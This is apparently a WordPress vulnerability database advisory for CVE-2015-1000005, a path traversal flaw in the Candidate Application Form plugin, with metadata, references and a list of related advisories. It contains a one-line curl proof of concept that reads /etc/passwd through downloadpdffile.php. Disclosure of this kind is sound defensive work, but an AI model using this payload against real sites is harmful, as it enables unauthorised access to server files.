Candidate Application Form <= 1.3 – Unauthenticated Arbitrary File Download | CVE 2015-1000005

Description

Plugin is still affected and has been closed.

The code in downloadpdffile.php does not do any sanity checks, allowing a remote attacker to download sensitive system files.

Proof of Concept

$ curl http://www.example.com/wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd

Affects Plugins

candidate-application-form

No known fix

References

CVE

CVE-2015-1000005

Exploitdb

37754

URL

https://packetstormsecurity.com/files/#132960/

Classification

Type

LFI

OWASP top 10

A1: Injection

CWE

CWE-22

CVSS

7.5 (high)

Miscellaneous

Original Researcher

Larry W. Cashdollar

Submitter

Larry W. Cashdollar

Submitter twitter

_larry0

Verified

Yes

WPVDB ID

446233e9-33b3-4024-9b7d-63f9bb1dafe0

Timeline

Publicly Published

2015-07-12 (about 8 years ago)

Added

2015-07-14 (about 8 years ago)

Last Updated

2020-10-21 (about 3 years ago)

Other

Published

Title

Published

2024-05-02

Title

CAS <= 1.0.0 - Unauthenticated Arbitrary File Access

Published

2024-03-28

Title

Import Export WordPress Users < 2.5.3 - Authenticated (Shop Manager+) Path Traversal

Published

2015-06-06

Title

SE HTML5 Album Audio Player <= 1.1.0 - Local File Include

Published

2023-12-27

Title

JVM rich text icons < 1.2.7 - Subscriber+ Arbitrary File Deletion

Published

2015-06-23

Title

wp-instance-rename <= 1.0 - Arbitrary File Download